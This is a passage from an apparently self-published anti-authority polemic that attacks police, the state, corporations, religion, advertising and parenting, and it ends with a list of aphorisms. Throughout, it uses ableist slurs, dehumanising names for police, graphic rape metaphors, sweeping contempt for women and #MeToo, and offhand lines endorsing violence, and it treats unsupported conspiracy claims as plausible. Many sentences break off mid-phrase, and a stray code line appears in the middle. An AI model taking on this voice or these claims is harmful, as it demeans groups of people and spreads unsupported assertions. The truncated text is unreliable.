master or hang master on a meat hook. I bet
one gets master to start acting right.

If your only choice is to comply,
regardless of morality, that is authoritarian,
totalitarian tyranny. This may be hard to
understand at first but authority is make-
believe. Same with religion and politician/police
worship, the paracosm is only real if you
believe it, too. For people with the ability to
mentally process their environment without
collapsing from fear - American authority has
no valid, moral, or rational foundation. Fear is

the United States' business. Eventually, force
and fear are required if authority wishes to
maintain that control/business. If your child is
about to put a paperclip in the lightsocket -
they should absolutely do what you say, but
the authority is still make-believe. Most of the
time though, authority is used to control
environment based on like/dislike. The
subjective whims of the authority figure. How
can a child learn their environment properly
this way? THEY FUCKING CAN'T. Stop trying to
call your behavior parenting. Yeah, sure, you're
teaching them how to live...around you.
Chances are great that most people can't
tolerate living with you. You have no societal
control so you try to mold your immediate
environment and those in it around your
desires and frustrations. Your Lordship. George
Carlin said something to the effect of
"...parents never teach their child to question
authority because they don't want to
undermine their own bullshit..." which leads to
a society full of adult children. Begging master.
Doing chores for master. A lot of people do
rebel, but they rebel counterproductively. For
example, "I know Jesus is bullshit, so I'll
become a Satanist!" going to the opposite
extreme of the same paracosm. It is still the
Jesus paracosm, they just chose to love a
different character in it. That's stupid. There
are people right this minute as I am typing and
right this minute you are reading it - trying to
convince others that the Earth is flat. There are
people trying to convince others that one rich
master loves us and the other doesn't. There

are people trying to convince others that there
are reptilian shapeshifters coming to send
humanity into another dimension of
consciousness. Gaia has an ad trying to claim
this is just the case:

Infuriating to me is that they have it

setup so the viewer subconsciously thinks it is
the History channel or something. Set and
setting. A three or four person panel in 'nice'
clothes with 'prestigious' titles, a professional
ad...saying reptilians are coming and are
already here. To stupid people, there must be
something to what they are saying. However,
this is by appearance, presentation, and
delivery only. A society of rational adults is not

controllable by oligarchs and plutocrats.
Society must be irrational and remain
irrational. Otherwise, master loses control. An
irrational society is not Anarchy but a
manageable chaos. I suggest that a rational
society is an unmanageable order. Goebbels
stated, "Propaganda works best when those
who are being manipulated are confident they
are acting on their own free will." People that
don't know what to believe for certain usually
default to corporate, state rhetoric. Especially
when challenged intellectually. Extremely hard
to defend something you don't understand.
Especially a direct order. That's why you hear
Schutze saying they were just doing their job.
They have no valid defense for their
exploitative behavior. Police are like an older
sibling. Only they can bully you, beat you up,
take your lunch money, and humiliate you.

American symbolism is you

approving of uncountable, inhumane
horrors committed...fucking look at you

def main():


We are all programmed to react to
environment in a certain way. Genetics. Now,
enter Environment. Society. Buttons and
button-pushers. Our code gets altered. A brutal
onslaught of sights, sounds, sensations. Now
add language. Maximize fear. Force resource
competition. Add ridiculous beliefs. Rotten
ways of existing in excess or depravity. Don't
you think this is the recipe for a mentally and
emotionally corrupt being? If a flag or some
other made up symbolism with all kinds of
death and atrocities behind it hasn't been
branded into the forefront of your defective
brain, you will most likely agree. Snack and
PlayStation slaves will not agree. I don't care. A
society should be constructed on reality not
what its mentally defective majority likes the
sound of or not. Each of these things is a
subroutine. A child process. You can alter your
main function but it takes introspection. Line by
line psycho-emotional bug hunting. If your
subroutines are garbage, your routine is
garbage. If your individual is garbage, your
society is garbage.

Worship your coffee, do you? I fucking

bet. Racing your death machine through the
fiberoptic lines of society to get your $10 an
ounce ethanol'd petrol. Milk, sugar, coffee, an
Italian name. Come to my house, I'll do the
same for $3 and you can pick whatever
language you like. I work a mean boil and
strain if it's max stress response your body
needs. America. Land of choice. So many
options. So many chemicals. So much available

for intake. Which corporate master gets your
federal debt credits? That's where the
psychological warfare comes in. Conglomerates
with teams of marketing and advertising think
tanks. Marketing and advertising is one thing
and one thing only - manipulation. How can
they convince you to hand back the federal
debt credits you spent your week slaving for?
Benefits, positives, advantages, never ever
why not or what's wrong or possible issues.
Only the 'positive'. There are some people that
know this, so they try to talk something
negative about the used car they are selling
but nothing that would break the deal. "It does
need new cupholders and a floor mat for the
rear passenger side. Hahaha, you"
Putting forth the 'I am honest...can't you tell
because I was not all positive in my pitch?'
image. Whether chemicals to clean, chemicals
to ingest for sustenance, or to alter your
mental/emotional state - chemicals bind us to
corporations and the state. Drugs eat away the
human will to resist. Drugs control and
consume. Drugs hinder, limit, cripple, kill, and
destroy. Self and familial destruction never felt
so fucking great. Ever heard a dealer say his
shit is garbage? Maybe you never heard a
dealer. If you haven't, you just think you
haven't or you're pretending. I bet you half of
your buttcheeks you're pretending. I don't want
your buttcheeks. Your dealer probably does
though. Literally, figuratively, or both.
Especially if you are a woman. Chemical
discount for a sexual extra, acting like they are
doing the basehead the favor. I want to say

my drug of choice is a laptop but I would be
lying. I don't have a drug of choice. I have
drugs of choice. Many people are told they can
beat chemical addiction by replacing it with a
physical one. Working out, hacking, etc.
However I hack and work out but also ingest
chemicals. Gabapentin, prozac, nicotine from
wraps, cannabis, caffeine, otherwise hacking
and working out don't happen. Without those
things, I would be completely handicapped for
a long time. Vulnerable. Susceptible. I have
many enemies. Low ranking, redneck town
cops to FBI agents to other street thugs.
Incarceration is not happening unless 12
politician begging, Blue Stripe Bandits groupies
don't like having their depraved heroes'
brutality/tyranny challenged. My medications
are always held hostage in jail, they will wish
their Schutze heroes would have executed me
in the street like the flag waving, nationalist,
badge wearing, gun toting, loot collecting
bitchhounds are known best for. Doesn't take
much for them to want that, just challenge
their symbolism/doctrine with logic and make
them feel as stupid as they should. Even
withdrawing from corporate chemicals I still
speak with more rational thought than most
employed by the state. My chemicals are my
prison and my vulnerability. I have tried for
years to quit them. I will end with them. I
absolutely could quit but I would not be able to
mentally function how I need to. I can do
without the others, but Gabapentin is murder.
15 years on this garbage. Jails refuse it as it is
about revenue. I do not and cannot sit around

and mentally consume garbage. I work on
coding projects like my RSAKiller
( and literary
projects like this and RCAPS. If I did not have
my chemicals, these things would not progress.
If these do not progress I am wasting my
existence in a stagnant prison of my own
acceptance. I am not being narcissistic or
delusional when I say that I have lived a life
most couldn't imagine. Witnesses and people
that know me will tell you the same. The things
I've done, the things that have been done to
me, the places I have been, the situations.
Almost everyone thinks their life is the story of
the century but that is not what I am getting at.
If I didn't write my experiences for others to
understand, I would have wasted them. Also,
writing helps me process though events. You
people do, think, and say some absurd things.
The vast number of you sometimes makes me
question myself but then I remember your
corporate thought process of fear & snacks and
I hold fast. Avoiding things that sound good
when some things that sound good are good, is
tough sometimes. People will let someone
continually fuck them over as long they
promise to fix it, validating their original
purchase. Like voting. Guarantees get wrapped
up in litigation. Lying about amending the 13th
amendment(slavery loophole) while making
people think something is being done about it:
‘Nothing will be done but it could lead to long,
drawn out litigation years from now where if
they violate they just have to pay a fine - which
comes from that exploited labor anyway‘.

amendment-loophole/ Neither the state, nor
corporations, nor the media are for us. Lie,
cheat, steal, exploit the lower classes, do what
you need to now and work it out later if you
have to. Usually the law, time, and or money
work in corporate favor. Remember that verdict
against Johnson & Johnson for their part in
opiates? None of that money went to the
victims of Johnson & Johnson. It went to the
state. Which is also a corporation. We are the
corn-fed, chemically sedated livestock that
corporations trade between themselves while
police ranch hands maintain social order. A cow
bumped into another one and now they are
both screaming for the ranch hand to come
choose the victor by master's wording book.
What is victory for these bovine bitch asses?
Ego and some extra feed. Totally worth being
subservient to master. Fucking idiots. Their
emotions tell them they are correct. Their
emotions tell them that this opponent did the
thing to them. "I am not wrong/bad/inferior
because they are. Master's representative said
so." That is absolutely horrid yet extremely
common 'logic'. The majority in fact. If it were
not the majority, society would not be this
corporate, financial construct you perpetuate
with every hour clocked in. Chemicals alter
emotion. No refutation. Drugs eat away the will
to resist. Emotionally supercharged beings are
much less sound in their mental processing. I
have not seen a document signed off by a
government executive saying, "On this date

during the 1980's, introduce them to crack
cocaine." but knowing the extent to which
governments and corporations throughout
history have been more than eager and willing
to go to keep your mental processing at the
level of a 4 year old - it makes me not dismiss
it. Then the revenue the state gets. Then they
get to make criminals out of everyone. Then it
justifies hiring more jackboot enforcers. It's
another perfect setup master has. My favorite
setup being that if you comply you perpetuate
the system and if you resist, you're crazy.

Consent of the slave is required in order

for master's authority. Consent can be and is
manufactured with fear, media, and when
those fail - force. A manual labor version of
rape. Deceive, lie, convince, manipulate.
According to society, these are all acceptable
behaviors when trying to place a part of your

body inside someone else's yet what is not
acceptable is doing it against the person's will.
To me these are not acceptable. An ultimatum
is no less rape than physical restraint. It's
worse in a way because you are making the
person feel like they chose it. Yes, the state
wants to fuck you. Corporations want to fuck
you. Fear. Ultimatums. Ultimately...force.
Guess what helps in mental susceptibility of the
subject? Chemicals. You can be more
susceptible to authority/manipulation while
under the influence or more susceptible while
lacking it. Holding hits hostage. There is more
than one way to skin a hostage. Fleece a
sheep. Tip a cow. Fat ass servers overclocked.
Get it? Think of a computer server as a
restaurant owner/server that lives there and is
open 24/7. The information is stored in the
kitchen and the server brings you your
requests. Your requests are usually arbitrary
and trivial yet provide revenue for the system,
continuing its existence. "I wanted mine served
with onions. Also, what you served didn't match
the headers on the menu!" Would these be
what they are, better, or worse had I never had
excess chemical intake? Considering my
intellect, would I be more intellectual or would I
be a mental invalid had my mother not used
chemicals while pregnant? My chemical intake
and my refusal to comply with the corporate,
american, police state seems to negate the
idea that drugs eat away the will to resist. Few
chemical reactions are guaranteed for 100% of
people that ingest them. I haven't had a length
of chemical free days long enough to know how

I process without. There is no way to go back
and rerun the experiment of life for myself, this
time without the chemicals. Alternatively,
perhaps it is the chemicals themselves that
accelerated disintegration of the authoritarian
construct. How many time have you been doing
something that wasn't hurting anyone, even
indirectly (for example, going 60 in a 55 that
isn't a construction zone. No school zone is 55
mph), and some authority with uncle sam's
phallus reaching his stomach decides you're
the one to pay the state for protection/safety
that day? How many times have you seen it,
yet assumed the person must have done
something. Otherwise the Schutze wouldn't
have taken away from their precious parallel
park conference time. Events that aren't
chemical can cause pleasant chemical
reactions. Why do you think the boots get off
on arrests? Don't think they do? Blue Stripe
Bandit groupies depend on them "protecting".
Is solving a Zale's robbery protecting people or
is it protecting master's money and economy?
The economy is a Ponzi scheme yet you can
hear most americans bleating about how
precious it is to them. They genuinely feel they
cannot exist and are not safe without it.
Master's barbed porkhammer grudgefucking
their brains. No condom. No KY or Vaseline. No
foreplay, no courtesy, no consideration.
Submit, die, or incarceration. These are your
options on planet america. A forced domestic
partnership where you get basic needs met as
long as you dedicate your existence mind,
body, and soul to master and master's

symbolism. #1776Heads

Fear dictates almost everything in this

construct. Sex sells, yes, but fear conditions. A
plastic woman on the cover of a 409 bottle is
not going to work on the majority. What if they
were afraid of the germs that 409 kills? Fear
has a nasty habit of spreading rapidly like my
biological mother wanting to fuck a Molotov.
People adopt irrational fears because others
do. There are some people that make fear their
identity. Police for example. Other street thugs
and gangs. Pastors. Politicians. Penal officers.
Prosecutors. Professionals. Protectors. People
that rally the majority against a specific group,
can only use fear to do so. Fear permits
dehumanization. Fear permits abandonment of
conscience. Fear is a root of evil. If you are not
afraid, you are not controllable. If you are not
afraid you won't combat other consumers for
crumbs in a depraved game of resource
competition. Hungry, hungry, corn-fed hippos.

This code is severely exploited and you

should engage in constant mitigation. We
receive a constant barrage of "this is what you
want!!" by corporations and most people
genuinely believe it is their own choice. All the
products are the best. Insert Carlin's
advertising phrases routine here. There is
never a reason you should not go with the
manufacturer's product. As a human in this
corporate construct do you desire things that
sound unappealing? People like kimchi and
meth so the answer can be yes. Usually it's a

<strong>'No!'</strong>. Which sounds better
and which is true: 25% off or 25% less because
we are trying to maximize profits? The opposite
can also be true. The price of items is arbitrary.
You can get a shirt for the price of a laptop and
a laptop for the price of a jet engine. What
genuine value then, has the laptop? To
manufacturers, distributors, and sellers, it is
the maximum you are willing to pay without
cutting out a large portion of the purchasing
demographic. If the max you are willing to pay
is $200 for a laptop(not brand specific), next it
is how little you'll accept for that $200. You get
sold the 2010 Dell if you'll take it. If not, then
they decide the maximum they'll let go for the
$200. Rape the consumer using high school
weed sale tactics. Gauge how ignorant and/or
desperate the customer is and exploit it. If
something about one of those laptops catches
you, your desire is going to release more of
your federal debt credits against your logical
will. Been fishing? Well, it's agitating to carry
everything in your pockets with your lures in
your hat. I bet you go buy a tackle box.
Especially if you want to fit the image of
fisherman. Like a person who jogs but buys
jogging clothes. There's no necessity. You can
claim necessity but you can justify anything to
yourself. Especially with reasons spoonfed in
doctrine and corporate rhetoric. More Gerber
master, please and thank you. That tackle box
though. You have to carry your gear so you
free up a hand by not taking a tackle box and
instead - you purchase cargo pants. Your desire
for comfort and convenience. The problem is

that there are all kinds of boxes and pants
already floating around the planet. Make use of
them. Take your power back from corporations
and states. Bug hunt your garbage code. You
don't even have syntax correct in most
functions. The logic is non-existent. Your
functions are few and they are loops.
1776Heads? Stuck in a loop. Christians,
Muslims, Jews, Republicans, Democrats, Bloods,
Crips, Kings, those that identify as some group?
All stuck in a loop. Hamsterwheels. How hard
they think they are actively doing something is
a complete mindfuck. They are actively
engaging in it. It would be hilarious if:

- it wasn't self-destructive
- it wasn't socially destructive
- they didn't break new minds of children
- those new minds didn't become adult majority
- that adult majority doesn't beg a rich person
to force his will on others with police(corporate,
nationalist, militant, jackboot enforcers, if you

If you grow up and want your desire and

fear - actually your entire emotional state and
psyche - to be owned by oligarchs, plutocrats,
authority, corporations, and the system, go
ahead. Just don't fuck with the minds of
children. You say it is your right but it isn't. Do
you think that because you put a part of your
body inside someone else's and released liquid
that you own your copy? Your copy is still a
free being of its own. Or do you think you have
mastered the universe and teaching everyone

to exist as existentially retarded as you do is
the best way? I don't force my son to live a
certain way. I constantly say things guiding but
choices are his. I can tell him, give him a direct
order even. Doesn't matter, authority is make
believe. Even if its me with it. The choice is
ultimately his. His mother took him to a church
where they roll around on the ground
mumbling the same repetitive nonsense
syllables and claim it is divine interaction.
Obviously I have a huge problem with this but I
cannot force him to not go. What better way to
make him want to go than by trying to force
him not to. Humans are inquisitive creatures.
We like to experience things ourselves. Hacking
children. Is my non-hindrance of information as
much as a control tactic as forcing the
information? Not control but manipulation and
not as dishonest/deceptive. I want them to
think freely unbound by desire, fear, and
corrupt intellectual processing. You want them
to think as you do. I don't want my son to think
as I do. Environments, factors, people, society,
etc are all different from the things that
sculpted my perception of reality. A lot of pain,
a lot of suffering, a lot of anger, a lot of
empathy, a lot of conscience. A whole lot of "I
would never go through this existence again for
any reason." That is a desire of mine for sure.
What would joy be without suffering? Not a
fucking roller coaster. I would gladly do without
both. What if instead of getting high and then
dealing with the comedown, you just didn't?
Boring right? Why? It's boring because you are
used to a constant sensory assault of

entertainment. Even work is supposed to be
awesome. Look at the hiring ads. "Come work
with a high energy, positive, caring family." 6
cashiers, two stockboys, and management.
Real exciting there at your local grocer. Parties
at work. No customer service required. Why
don't ads tell the truth? You wouldn't spend
your federal debt credits. "Come slave for basic
needs, you'll get swing shift and called in often,
you can refuse but it'll work against you. We'll
pay you the minimum required by law and to
keep profits mainatined. No benefits. No smoke
breaks. No phones. Time to lean is time to
clean. Your coworkers are full with petty drama
and interoffice politics."

Media and the state tagteam us like a

real life WWE match. Not real life as in in
person, but real life as in scripted and people
eat it up like the events weren't mapped out
beforehand. Getting excited for their chosen
player in a fixed MMA match. The opponent is
taking a dive but they think their celebrity won.
Every news article you see about a 'crime' that
just happened - they get spoon-fed information
by system representatives. Often, the media is
the 4th branch of american government.
Propaganda, spun narratives, turning the
victims into the perpetrators and the
perpetrators into heroes:

I don't know about you, but I am past
tired of having my mental and emotional
existence stolen by corporations and the state.
If you are fighting with people over which of
the 6 media conglomerates is correct - you
aren't past tired of it. You live it and love it.
Otherwise, you probably wouldn't be defending
them so severely. How many times have you
heard the news say with some 'we are like
family' sounding garbage, "You can absolutely
trust what we tell you, we are your geographic
region's representative for one of 6
conglomerates!" They don't say those exact
words but it translates that way. Repeat after







Xenophobia is rampant. As shown by

studies, we feel less empathy for those not 'like

We automatically see race. Humans are

categorical thinkers. We navigate our
environment by 'pain & not pain', 'good & bad'.
Biological programming and environmental. A
society of ganged up ethnicities adopting ways
of 'surviving' that are socially accepted by their
hierarchical superiors. "The enemy of my
superior is also my enemy" says every
authoritarian, boot worshiping statist ever.
Most xenophobes are using recycled social
code. His father before his father cooked
shrimp. Mama said. Shell game. You have three
cups, different color. Which one is the ball of
evil in? Can you tell by the color? Absolutely
not, but your dumbass brain sure is going to
try. "Today my name on my Starbuck's cup was
written in blue instead of black, so I think that's
a sign the blue cup is the one I am supposed to

choose." Humans and their symbolism and
their garbage correlations because categorical
thought saves time. Do you want to read the
entire source code of a software before you
buy it or just see the name "Kaspersky" or
"Norton" and decide with what is presented on
the outside of the cup? Imagine the time that
would take having to make all of your decisions
this way. By the time you decide which
software to buy, it's already out of date and
needs patches. By the time you read the
source code of all your processed corporate
garbage you call sustenance you will need to
eat again. Companies have to print their source
code. The Nutrition Facts and Ingredients
sections. Yeah sure, when your wages/labor are
being depleted for a purchase you're more
likely to review the source code. However when
it's a human you don't know - why even worry
about it? Why even? Because we are supposed
to be an intelligent and evolved species.
Knowing none of us really presents our true self
to others, why do you make judgment calls
based on these presentations? I do it, but by
the arguments other people give me for doing
it, I know I do it for a different reason and in a
different way.

One is socially destructive and false. The

other is mine. If you dress a certain way
besides utility/comfort, this shows that you
care about image. Image and presentation.
Symbolism misrepresenting substance. I do
not. Image and presentation are socially
destructive. Embarrassment is social

sandpaper. Why would you dress like this
except to:

a) attract attention
b) attract attention
c) attract attention
d) beg individuality in a purposeless society
e) all of the above ?

You know it is e. I know it is e. If you do

not know it is e, then you haven't broken into
introspective thought. An entire society of lost
individuals trying to find themselves by
mimicking the behavior of those that depend
on their exploitation. If I dress like this
actor/rapper/fighter, then others will see me
the same way I see them. What is absurd about
d is that they are trying to be an individual by
copying someone else. That thought process is
fucking lucrative for the oligarchs and
plutocrats. When people think they are doing
something but are in fact doing the severe
opposite. These Starburst packs are having
children. Lots of them. Now, for my judgment
call replace Starburst with a church outfit.
Often the same but for this, it's a suit. This
person cares about their physical appearance
more than anything. Having bodily hygiene is
important, I am talking about looks. If he stinks,
help him to a shower, or just be understanding.
I trust a person who stinks more than I trust a
person in a suit. Facts. A sort of inverse of the
olfactory rhetoric fallacy:

A vicious, zoological-level fallacy of

pathos in which opponents are marginalized,
dehumanized or hated primarily based on their
supposed odor, lack of personal cleanliness,
imagined diseases or filth. E. g., "Those
demonstrators are demanding something or
another but I'll only talk to them if first they go
home and take a bath!" Or, "I can smell a Jew a
block away!" Also applies to demeaning other
cultures or nationalities based on their differing
cuisines, e.g., "I don't care what they say or do,
their breath always stinks of garlic. And have
you ever smelled their kitchens?" Olfactory
Rhetoric straddles the borderline between a
fallacy and a psychopathology. A 2017 study
by Ruhr University Bochum suggests that
olfactory rhetoric does not arise from a simple,
automatic physiological reaction to an actual
odor, but in fact, strongly depends on one's
predetermined reaction or prejudices toward

I've met lots of both. Definitely been

deceived and exploited by suits more than I
have been by the homeless. No competition
whatsoever. Not all homeless stink and not all
people with homes have decent hygiene. We
are programmed biologically and societally to
clan up. Most humans do so based on easily
identifiable descriptors. Their immediate
image. Kindergartners stuck on colors. Animals
have superhero snouts compared to our ability
to detect scent. Humans smell a fart and start
freaking out. Americans love getting to pick
and choose which part of their existence is
justified by being an animal and which parts

are justified by being more than just an animal.
It's like feminists that want the benefits of
being a male. Go first at everything? They'll
keep it. Pay for the meal? Pass. A man hits
them and gets consequences? They'll take it.
They hit a man and get consequences? Hard
pass. Everyone with their own definitions of
what constitutes 'civilized' behavior. Murdering
people in the street for arbitrary infractions?
Not acceptable. Having a police officer do it?
Acceptable. Civilized in first world countries just
translates to "Do nothing to protect yourself
but still clock in, we your masters will handle
everything else!" Executing someone in the
street is inhumane so let them rot in a concrete
and steel box for decades instead? Ha! No
instead. We do both at maximum efficiency and
capacity. What a defenseless, retarded society.
Not allowed to think or act, can only ask master
for permission and help. You are in traffic with
no witnesses. Someone pulls a gun on you, you
happen to take it from them, and use it on
them - you are going to jail for homicide.
Someone has to pay for every bad thing that
happens ever, and police work would be too
expensive when there is an instant culprit
society will believe did it, as long as police tell
them so through the media. The false
accusations and wrongful convictions aren't
just police, prosecutors', and judges' fault.
They're your fault. You keep begging police,
politicians and judges. You keep begging
master to solve your social issues. This is not
socially sustainable yet you dumbass flagpole
phallus takers keep trying your mental hearts


Slaves work best divided. Flagtards.

Division of labor has more than one meaning. If
you are at odds socially, then you'll most likely
try to compensate with some type of corporate
garbage. Food, chemicals, drugs, electronics,
engines, etc. It never fully does, so now you're
stuck trying to justify these self and socially
destructive subroutines you have allowed to
corrupt your programming. Much easier to
justify it than bug hunt huh, bitch ass? You non-
intellectual weenie. You HGH injecting, bully of
a backyardigan. Your sports team winning is

the same emotional rush when master's
jackboots choose your spun story in a forced
mediation. You didn't win anything. You
watched someone else act while you talked.
The American way. I try not to capitalize things
I do not respect. Governments, religions,
certain people, unless they're kicking off a

They aren't the same color, culture,

geographic region, team, or language as you so
it's fuck 'em, right? Imagine being so devoid of
a personality and identity that you adopt ones
the state hands you. You are black, be proud.
You are white, be proud. You are Native
American, be proud. You are LGBTQTOOMANY+
be proud. Pride is division. Why would you be
proud of something you cannot help and have
no control over? I am Irish-Italian and some
other shit probably but is that something I am
going to start waving around? I am not Irish-
Italian and some other shit probably. I am a
bag of cells, muscles, and bones, with a
consciousness trying to understand all of it.
When I was a juvenile I got the flags tatted on
my inner arms. I would like to have zero
tattoos. Choices. Now I just wear long sleeves.
You live on planet Earth, not planet america.
Gang gang for the simple. There are several
reasons why I resist the corporate american
police state by myself:

1. The state destroys organizations that

compete with or challenge it. I am no
competitor. I am a challenger trying to stop

exploitation of life and unnecessary, excess
suffering. If you form a gang, even calling it a
militia, the state wins automatically. The state,
other corporations, and the neo-fascist
enforcers claim that they protect the 'little
guy'. What the fuck is the little guy? Why is
that even a valid concept except as a
descriptor of someone's actual, physical stature
or term of endearment for a mouse, spider, cat,
frog, etc? You are not bigger(worth more) than
I am and I am not bigger(worth more) than you.
My life does not take priority over yours and
vice versa. I am not going to give up my seat
on the bus to a pregnant woman with children.
I will give up my seat to an elderly
woman/man. I am not going to reward behavior
that makes society worse. I will step in front of
a vehicle to keep it from running over a frog,
turtle. I struggle with insects. I will not kill them
but would I step in front of a vehicle to prevent
the death of one? No. I want to say yes to
present an image of 'showing by example'.
Value all of life, even the smallest but lying
about my character substance is not showing
by example. It's doing what politicians, pastors,
police, and plutocrats do. The conscience is a

2. I want to show by example. People are

afraid of the other groups so they group up
themselves. I don't gang up. I challenge
authority without weapon and without
numbers. Courage is not lack of fear but
persistence through it. Don't go too far with
that because that is similiar to suicide bomber

logic. I know that oligarchs, plutocrats, and
their jackboot enforcers cause so much
suffering to innocent people that not resisting
is an abomination of the conscience. I do what
causes the least amount of suffering.
Ambushing police or blowing yourself up will
solve nothing and only makes victims.
Especially out of the jackboot enforcers.
Challenge them intellectually on film and if
they try to abuse their power and cage you
because they can't back up their abusive
authoritarian garbage - then resist. It hurts but
why would you let yourself be escorted to your
own exploitation/slaughter? You go to jail and
there are businesses making billions of
dollars from family members. (GTEL,
SecurusTech, Aramark, Tiger Commissary,
CCA/CoreCivic, Vanguard, BlackRock, Fidelity). I
cannot condone it. I will not voluntarily allow it.
If people show that you can resist by yourself
and make change, then the american Gestapo
tactics don't work anymore. You aren't afraid,
so you are not able to be turned against those
also being victimized by the state.

3. I have no black belt, no weapons

excluding my original Casey Jones Kali sticks,
and no gang members to have my back. The
state preys on the vulnerable. How can a
similarly defenseless person resist a military?
What about one in a wheelchair? Obviously, the
war cannot be physical. The battle involves
physical resistance because the boots always
use force when they are afraid and stupid, but
overall a skin over bones is not going to beat

flakjackets, artillery, and strength in numbers.
If/when the schutze force my death, there is to
be substance behind me to continue. Intellect
can beat strength in numbers however, the
fallacy is that I am heavily relying on mentally
defective people to all of a sudden say, "Oh, I
get it now, the state and other corporations
don't love us or care about us at all! They care
about their cheap labor and we provide that.
They exploit every aspect of our existence
while making us beg for it and be proud of it!"
or that they'll even take the time to read
something that challenges every social
construct they've bound their mental
processing to. Will it register? Like a drifter at
an inn in the middle ages, probably not. Logic
usually does not feel good. It isn't always at
odds with emotion, but often enough that
people should be spending a lot more time
checking and rechecking their 'gut feeling'. Gut
feelings with holes in your story can lead to
holes in your abdomen with a different gut
feeling. Or often enough holes in someone
elses abdomen with still a different gut feeling
in yours. If you have a conscience.

Guilt followed by introspection isn't for

everyone. The state has its own version of guilt
(everyone but its party members are guilty).
Corporate environments have their own as do
religions. If your guilt is in excess, which all of
those entities heavily reinforce in our every
daily lives, you are controllable. Try not buying
a christmas or birthday present for someone
you love, though you have the money. It's for

the kids is a common line. The major problem
with that is, either you want rational adults or
you want santa claus fearing imbeciles, mental
invalids. Behavior adoption and information
absorption begin early in life. 3, 4, 5, 6 years
old. "We'll tell them the easter bunny isn't real
when he's 9." Well, you've just shown your
child that you have no issue blatantly lying to
them and following all the way through with it.
That makes you a garbage parent, no matter
how many baubles and trinkets you wrap for
the poor, little bastard. Just because other
stupid people engage in a behavior doesn't
mean you should get retarded with them. Most
jump off the bridge screaming, "Do as I say not
as I do!" Parent of the Year.

my satori versus your doctrine

brent elisens

Add materials, subtract their humanity,
and you get class division over product.

Time is only what our inventions say it is.

Exit the clock to exit the matrix.

Xenophobia and views of manifest

destiny usually hang out together.

Is the sun the nucleus of a massive cell,

if so what does that make the Earth?

People cannot pay their electric bills but

look how much energy is wasted on christmas

If you don't clock in as the cheap labor

you won't survive. That's ultimatum labor not
voluntary employment.

Only in a society built on lies would the

truth need credentials.

Every month has holidays. Holidays are

nothing more than an economy boost. Debt
slaves spend their wages on shit they don't

We live in a free speech society where

you go to prison for words.

If your god has to coerce, convince, or

threaten me through you, it has a deity status
of zero.

If you pray to your god to protect you
then you either don't have faith or you think
he's doing it wrong.

Religion and the state cornered the

morality market yet both have committed
exponentially more atrocities in the name of it.

If you found out Newton raped and killed

kids, would you remove calculus from schools?

Do you consider the amount of life you

kill doing unnecessary things like cutting the

We cannot measure the smallest or

largest anything therefore understanding our
existence relative to everything else is almost

If any other species caused the amount

of destruction and suffering that we do, we
would exterminate it.

Corporations and industry are running

the planet into the ground.

You live on Earth not on america.

The media prints what people want to

read while those people pretend to be outraged
after reading what they themselves wrote.

If your existence were legitimate you

would not need a flag or a cross.

Is eating GMO's cannibalism?

Say what you want about your enemies

but we learn more about ourselves and each
other through conflict than stability.

The rich and famous could have helped

society a long time ago but what are gods if
they've no one to worship them?

Protective orders/injunctions are not


If reality was law, the religious would be


Corporations make you beg for slavery,

abandon your sense of self, and then be
grateful for it.

Amenities through slavery are

indentured delusions.

Basic needs should be separate from the


Anger doesn't make the monster, tone

police just focus on delivery.

Is ascension through suffer?

Everyone has a god and their god is the

only one.

Misapplication of labels can cause
serious injury and death.

You're worth more than the government

gives you permission to be.

People get more food than they ordered

and send it back for replacement, wasting the

Vehicles are a state racket.

Politics is just another reality tv show for

the simpleminded.

A parcel of land per crop for profit is a

shit system.

Provoke until they react so you can

scream victim. (american proverb)

Knowledge vs democracy is intelligence

vs idiocrasy. Their grains of truth are null, but

Trees are the earth's hair and we are


We are descendants of fish.

Right to privacy has to be limited. People
can't fuck kids then when they get caught say,
as legitimate excuse, "You weren't supposed to
find out!". Florida has such laws:

Whoever told you that you needed to eat

three meals a day was just trying to sell you

Work ethic is a scam designed to trick

you into taking pride in your own exploitation.

With the natural disasters, diseases,

carnivorous predators, accidents, etc it's
sickening that what you have to fear most is
other humans.

The Star-Spangled Banner = Die Horst

Wessel Lied. The hand salute = the hand

An honorable sense of morality can't

adapt to the construct of today's society.

Once you stop choosing sides politically,

you'll see both sides are against you socially.

You choosing between two sides of a sick

system is you still choosing the sick system.

The chemical age, the industrial
revolution....I don't think I trust humanity to not
indirectly kill us all, by trying to make things
'better' for us all.

The goal is to stop injustice, not play

whackamole with it.

~83% of people believe they can fix the

system by filing paperwork.

The email address I used in a domestic

terrorism case I worked...I made it so they'd
have to say 'fart' twice in court:

A man with a forgery charge because he

has no money is less of a threat but the child
molester goes free until court because he can
afford bail.

Most judges got their robes at party

galaxy and their degrees on MS Paint.

People scream how corrupt the police

and the system are, but are quick to use them
against someone they don't like.

Most humans are obstacles.

Did your ex beat you, or did every

person who is your ex's gender also beat you?
Stop applying specific incidents that happened
to you, to groups of people as a whole.

Bad words and an asshole demeanor do
not mean facts lose weight.

Sweaty men in tights chasing balls with

other sweaty men in tights. However I'm not a
manly man because i don't like sports.

take your children, you let them.

take your wages, you let them.
take your freedom, you let them.
take your order wrong, it's an issue.

"When i get hungry I get cranky"...well if

you get cranky you get punched. Quit trying to
justify and continue shit behavior.

Go look at your grocery store's food

section and then in your mind picture the
63,418 other grocery stores across the country
and their food sections. so much excess yet so
unattainable...unless of course you scan your

People post their entire life on social

media then when someone challenges a part of
it, they say - "you don't know me".

People post pictures of food then say,

'Stop world hunger!'.

'If you don't accept me the way I am,

then you don't love me' is an excuse to make
the other person do all the mental/emotional

Some women sexualize themselves with
suggestive poses with minimal attire then when
a man likes all of their pictures giving them
that attention they absolutely were fishing for,
they say, 'creep'.

#MeToo is literally read as 'pound me too'.

People say they want to learn to be self-

sufficient without relying on money or the state
but then they say, 'I can't today, I have to go to

Whatever you are known for 'good' or

'bad', be willing to let go of the image and your
attachment to it. People will find any reason to
love, any reason to hate.

The government treats you like children

so act like it. Question everything. That doesn't
mean reject everything, it just means accept
nothing for face value.

Stop being afraid of germs and bad guys.

fear makes you abandon rational thought and
relinquish control and dollars.

Steal the wealth of the politicians and

bankers by not giving it to them.

Humans are, at the base, animals

manipulating their environment.

If they can make you out to be the
monster, then they don’t have to accept
responsibility for their actions.

Conflict and reconciliation. How many

cycles of that? We are all angry and most of us
feel bad after even though our anger was

Xenophobic(noun): having shown the

behaviors of a child in kindergarten still stuck
on colors.

Uniformed/patrol police protect the

system, not its livestock except as a means to
protect the system.

Voting is you trying to impose your

favorite rich master's will on others in a 'free'

Existence is a state/corporate racket.

basic needs barely met and to remain in
constant fear of losing them. That is what we
get for our cheap labor.

Many statistics come from surveying

